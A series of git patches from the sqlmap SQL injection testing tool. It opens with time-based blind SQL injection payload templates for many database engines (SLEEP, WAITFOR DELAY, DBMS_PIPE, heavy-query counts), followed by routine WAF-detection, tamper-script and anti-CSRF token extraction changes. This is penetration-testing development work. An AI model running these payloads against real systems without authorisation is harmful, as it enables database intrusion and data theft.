+189,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) @@ -208,7 +208,7 @@ 4 3 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) @@ -230,7 +230,7 @@ 4 5 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) @@ -251,7 +251,7 @@ 4 1 1 - 0 + 1-8 1 ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' @@ -273,7 +273,7 @@ 4 4 1 - 0 + 1-8 1 ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' @@ -294,7 +294,7 @@ 4 1 1 - 0 + 1-8 1 ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL @@ -314,7 +314,7 @@ 4 4 1 - 0 + 1-8 1 ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL @@ -333,7 +333,7 @@ 4 2 2 - 0 + 1-8 1 ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL @@ -353,7 +353,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL @@ -372,7 +372,7 @@ 4 4 1 - 0 + 1-8 1 ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END @@ -392,7 +392,7 @@ 4 5 1 - 0 + 1-8 1 ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END @@ -411,7 +411,7 @@ 4 5 1 - 0 + 1-8 1 ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END @@ -431,7 +431,7 @@ 4 5 1 - 0 + 1-8 1 ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END @@ -450,7 +450,7 @@ 5 3 2 - 1,2,3,9 + 1-8 1 ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]) @@ -470,7 +470,7 @@ 5 5 2 - 1,2,3,9 + 1-8 1 ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]) @@ -489,7 +489,7 @@ 4 3 2 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) @@ -510,7 +510,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) @@ -530,7 +530,7 @@ 4 4 2 - 0 + 1-8 1 ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE @@ -551,7 +551,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE @@ -571,7 +571,7 @@ 5 4 2 - 1,2,3,9 + 1-8 1 ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3 @@ -591,7 +591,7 @@ 5 5 2 - 1,2,3,9 + 1-8 1 ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3 @@ -610,7 +610,7 @@ 4 4 2 - 0 + 1-8 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END @@ -631,7 +631,7 @@ 4 5 2 - 0 + 1-8 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END @@ -651,7 +651,7 @@ 4 4 2 - 0 + 1-8 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END @@ -672,7 +672,7 @@ 4 5 2 - 0 + 1-8 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END From a8a7dee8003eb71c9570bd546dbb2d38085514e5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 15 Sep 2018 21:36:21 +0200 Subject: [PATCH 284/428] Fixes #3239 --- lib/core/settings.py | 2 +- tamper/xforwardedfor.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index cdb05523a55..816e03770f6 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.23" +VERSION = "1.2.9.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py index f4cdda1140a..e14b4909260 100644 --- a/tamper/xforwardedfor.py +++ b/tamper/xforwardedfor.py @@ -25,6 +25,6 @@ def tamper(payload, **kwargs): headers = kwargs.get("headers", {}) headers["X-Forwarded-For"] = randomIP() - headers["X-Clinet-Ip"] = randomIP() + headers["X-Client-Ip"] = randomIP() headers["X-Real-Ip"] = randomIP() return payload diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 0dd04c2cd66..daefafdcef8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4991b844fe999aba86dfd13a672c95b7 lib/core/settings.py +018e7c47d53529bd5a3eab2e3405436c lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -286,7 +286,7 @@ cc212839f55692d422beef3a8e22a8d4 tamper/uppercase.py f2b9eac52d346315f5705f71beeda791 tamper/varnish.py 0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py 0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py -23d845e9f937f2a31c43767b8a8fcff6 tamper/xforwardedfor.py +bb87c2c0ec66927015c9709aaaf93561 tamper/xforwardedfor.py 1ebf563bb2cb18b68ea952418bba0ec5 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py From 2d2b20344d57be1a1e6aa9ea2d60542d731429db Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 15 Sep 2018 23:17:32 +0200 Subject: [PATCH 285/428] Minor patch for bigip WAF script --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/bigip.py | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 816e03770f6..b12549a1fde 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.24" +VERSION = "1.2.9.25" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index daefafdcef8..e9eb6c16fd5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -018e7c47d53529bd5a3eab2e3405436c lib/core/settings.py +94b6f9ade36d5622998a480dcea19946 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -400,7 +400,7 @@ b61329e8f8bdbf5625f9520ec010af1f waf/armor.py 6ea7b4ff5f111acb0b24186ef82c3f2d waf/aws.py ef722d062564def381b1f96f5faadee3 waf/baidu.py 07bc4b531d2353c9acfbfcada94ff12b waf/barracuda.py -82efee4639f7be75041c0145a6bc8578 waf/bigip.py +44f724ab7d333397975fecdf7e50be56 waf/bigip.py 6a2834daf767491d3331bd31e946d540 waf/binarysec.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py diff --git a/waf/bigip.py b/waf/bigip.py index 82a39a7978c..9cc248a8003 100644 --- a/waf/bigip.py +++ b/waf/bigip.py @@ -19,7 +19,7 @@ def detect(get_page): _, headers, code = get_page(get=vector) retval = headers.get("X-Cnection", "").lower() == "close" retval |= headers.get("X-WA-Info") is not None - retval |= re.search(r"\ATS\w{4,}=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None + retval |= re.search(r"\bTS[0-9a-f]+=", headers.get(HTTP_HEADER.SET_COOKIE, "")) is not None retval |= re.search(r"BigIP|BIGipServer", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None retval |= re.search(r"BigIP|BIGipServer", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None retval |= re.search(r"\AF5\Z", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None From ca9a56c0ff38d97ab329c32b13b2a79f08e389c7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 15 Sep 2018 23:27:24 +0200 Subject: [PATCH 286/428] Minor update of WebKnight WAF script --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/webknight.py | 3 ++- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index b12549a1fde..eb83b3c2f46 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.25" +VERSION = "1.2.9.26" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e9eb6c16fd5..affd4e154e4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -94b6f9ade36d5622998a480dcea19946 lib/core/settings.py +1d4a4c8a47f7d7ce2b5fa59548e84bc5 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -455,7 +455,7 @@ a687449cd4e45f69e33b13d41e021480 waf/uspses.py 20840afc269920826deac2b6c00d6b9c waf/wallarm.py 11205abf397ae9072adc3234b656ade9 waf/watchguard.py 9bf34539f382987490d2239d8ef0a651 waf/webappsecure.py -5b1eefdc39d449a74fce0564364b0e09 waf/webknight.py +6802052ddae241e2f4f78974ed11904a waf/webknight.py 11a5c6b10ced11e505a74e36ee2503b3 waf/wordfence.py 68e332530fab216d017ede506c3fec2f waf/yundun.py bea35ba732ccc9548e6c4023cea6832b waf/yunsuo.py diff --git a/waf/webknight.py b/waf/webknight.py index ed9247bdd0e..54abfa8aca4 100644 --- a/waf/webknight.py +++ b/waf/webknight.py @@ -16,9 +16,10 @@ def detect(get_page): retval = False for vector in WAF_ATTACK_VECTORS: - _, headers, code = get_page(get=vector) + page, headers, code = get_page(get=vector) retval = code == 999 retval |= re.search(r"WebKnight", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None + retval |= any(_ in (page or "") for _ in ("WebKnight Application Firewall Alert", "AQTRONIX WebKnight")) if retval: break From 3e72da66f9408de4dc44060f50cffb33fd7b9e44 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 18 Sep 2018 16:45:08 +0200 Subject: [PATCH 287/428] Minor update (preventing WAF specific response reports on generic 403) --- lib/controller/checks.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 56351fd8c3d..f96a63f307c 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1450,7 +1450,7 @@ def _(*args, **kwargs): retVal.append(product) if retVal: - if kb.wafSpecificResponse and len(retVal) == 1 and "unknown" in retVal[0].lower(): + if kb.wafSpecificResponse and "You don't have permission to access" not in kb.wafSpecificResponse and len(retVal) == 1 and "unknown" in retVal[0].lower(): handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.SPECIFIC_RESPONSE) os.close(handle) with openFile(filename, "w+b") as f: diff --git a/lib/core/settings.py b/lib/core/settings.py index eb83b3c2f46..656274b857d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.26" +VERSION = "1.2.9.27" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index affd4e154e4..497139b458a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -24,7 +24,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -0d4c9c5936d0c063f4b08318f26ad5ca lib/controller/checks.py +c799e4aa5cf1ad50fab0c970885c61d9 lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -1d4a4c8a47f7d7ce2b5fa59548e84bc5 lib/core/settings.py +423c57c6503bbbaa42fa832833381246 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py From 0c7eecee9f1b30287eefaaf5a7bb93b657ea867c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 18 Sep 2018 16:52:17 +0200 Subject: [PATCH 288/428] Trivial update (message language) --- lib/controller/checks.py | 7 +++---- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 7 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index f96a63f307c..e8d8b0f527a 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1232,7 +1232,7 @@ def checkStability(): logger.error(errMsg) else: - warnMsg = "target URL content is not stable. sqlmap will base the page " + warnMsg = "target URL content is not stable (i.e. content differs). sqlmap will base the page " warnMsg += "comparison on a sequence matcher. If no dynamic nor " warnMsg += "injectable parameters are detected, or in case of " warnMsg += "junk results, refer to user's manual paragraph " @@ -1317,9 +1317,8 @@ def checkRegexp(): rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page) if not re.search(conf.regexp, rawResponse, re.I | re.M): - warnMsg = "you provided '%s' as the regular expression to " % conf.regexp - warnMsg += "match, but such a regular expression does not have any " - warnMsg += "match within the target URL raw response, sqlmap " + warnMsg = "you provided '%s' as the regular expression " % conf.regexp + warnMsg += "which does not have any match within the target URL raw response. sqlmap " warnMsg += "will carry on anyway" logger.warn(warnMsg) diff --git a/lib/core/settings.py b/lib/core/settings.py index 656274b857d..3cd18dd1d14 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.27" +VERSION = "1.2.9.28" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 497139b458a..09d93d8909f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -24,7 +24,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -c799e4aa5cf1ad50fab0c970885c61d9 lib/controller/checks.py +ba0f924d43ff1e41f070afb003ed0aaa lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -423c57c6503bbbaa42fa832833381246 lib/core/settings.py +29691989c16b3240427c4159a2db6129 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py From dd9bfd13f281a687538384b29bb94bf7d7ce53b9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 18 Sep 2018 17:03:27 +0200 Subject: [PATCH 289/428] Trivial update --- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3cd18dd1d14..4c7e8fc9104 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.28" +VERSION = "1.2.9.29" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index e04248de12d..591fc4f5357 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -56,7 +56,7 @@ def _orderByTest(cols): query = agent.suffixQuery(query, suffix=suffix, comment=comment) payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) - return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and not kb.heavilyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None + return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order (by|clause)", "unknown column", "failed")) and not kb.heavilyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1): infoMsg = "'ORDER BY' technique appears to be usable. " diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 09d93d8909f..bb5d71dddab 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -29691989c16b3240427c4159a2db6129 lib/core/settings.py +c4de3786929e1e0fcf2a614a58679588 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -100,7 +100,7 @@ db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 6007347548e85383705eaa4b863448a2 lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py +f7813cdee00df8f98d6f811475e520a1 lib/techniques/union/test.py 7361338240ecd9d01d1d10ec76bce069 lib/techniques/union/use.py 77ff35587af9e3dfde63b8327e230f9a lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py From 8abae02111f72517920a81b01d78158e68c0818b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 18 Sep 2018 22:05:52 +0200 Subject: [PATCH 290/428] Improvement of anti-CSRF token extraction --- lib/core/settings.py | 4 ++-- lib/parse/cmdline.py | 2 +- lib/request/connect.py | 16 ++++++++++++++-- txt/checksum.md5 | 6 +++--- 4 files changed, 20 insertions(+), 8 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 4c7e8fc9104..83687a20410 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.29" +VERSION = "1.2.9.30" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -755,7 +755,7 @@ NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File." # Infixes used for automatic recognition of parameters carrying anti-CSRF tokens -CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf") +CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf", "token") # Prefixes used in brute force search for web server document root BRUTE_DOC_ROOT_PREFIXES = { diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 4570b9996f1..b6a46c0b3d4 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -207,7 +207,7 @@ def cmdLineParser(argv=None): help="Parameter used to hold anti-CSRF token") request.add_option("--csrf-url", dest="csrfUrl", - help="URL address to visit to extract anti-CSRF token") + help="URL address to visit for extraction of anti-CSRF token") request.add_option("--force-ssl", dest="forceSSL", action="store_true", help="Force usage of SSL/HTTPS") diff --git a/lib/request/connect.py b/lib/request/connect.py index d114663b7c1..d15a2c4d814 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -948,15 +948,27 @@ def _adjustParameter(paramString, parameter, newValue): return retVal page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST)) - token = extractRegexResult(r"(?i)]+\bname=[\"']?%s[\"']?[^>]*\bvalue=(?P(\"([^\"]+)|'([^']+)|([^ >]+)))" % re.escape(conf.csrfToken), page or "") + token = extractRegexResult(r"(?i)]+\bname=[\"']?%s\b[^>]*\bvalue=[\"']?(?P[^>'\"]*)" % re.escape(conf.csrfToken), page or "") if not token: - token = extractRegexResult(r"(?i)]+\bvalue=(?P(\"([^\"]+)|'([^']+)|([^ >]+)))[^>]+\bname=[\"']?%s[\"']?" % re.escape(conf.csrfToken), page or "") + token = extractRegexResult(r"(?i)]+\bvalue=[\"']?(?P[^>'\"]*)[\"']?[^>]*\bname=[\"']?%s\b" % re.escape(conf.csrfToken), page or "") if not token: match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "") token = match.group(1) if match else None + if not token: + token = extractRegexResult(r"\b%s\s*[:=]\s*(?P\w+)" % re.escape(conf.csrfToken), str(headers)) + + if not token: + token = extractRegexResult(r"\b%s\s*=\s*['\"]?(?P[^;'\"]+)" % re.escape(conf.csrfToken), page or "") + + if token: + match = re.search(r"String\.fromCharCode\(([\d+, ]+)\)", token) + + if match: + token = "".join(chr(int(_)) for _ in match.group(1).replace(' ', "").split(',')) + if not token: if conf.csrfUrl != conf.url and code == httplib.OK: if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bb5d71dddab..460896a280d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c4de3786929e1e0fcf2a614a58679588 lib/core/settings.py +64ae44f8e2b61c49354f3866ba40a926 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -61,7 +61,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -fc5a42940327dd3f40a780c865b6b136 lib/parse/cmdline.py +134bbbf67bb30c188b8409c0b3bfbc2a lib/parse/cmdline.py 